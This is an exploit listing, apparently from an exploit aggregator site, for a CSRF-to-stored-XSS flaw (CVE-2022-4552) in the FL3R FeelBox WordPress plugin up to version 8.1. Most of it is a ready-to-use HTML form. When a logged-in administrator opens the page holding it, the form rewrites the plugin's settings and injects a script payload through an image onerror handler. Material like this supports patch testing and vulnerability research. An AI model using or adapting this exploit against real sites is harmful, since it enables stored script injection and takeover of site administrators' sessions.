Exploit for FL3R FeelBox <= 8.1 - Settings Update via CSRF to Stored XSS CVE-2022-4552

Name: Exploit for FL3R FeelBox <= 8.1 - Settings Update via CSRF to Stored XSS CVE-2022-4552
Rating: 5 (97 reviews)

2023-01-04 | CVSS 0.3

## https://sploitus.com/exploit?id=WPEX-ID:307B0FE4-39DE-4FBB-8BB0-F7F15EC6EF52
Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/options-general.php?page=feelbox" method="POST">
    <input type="text" name="feelbox_submit_hidden" value="Y">
    <input type="text" name="fl3rfeelboxtitle" value='Do you like this post?"><img src onerror=alert(/XSS/)>'>
    <input type="submit" name="submit" value="submit">
</form>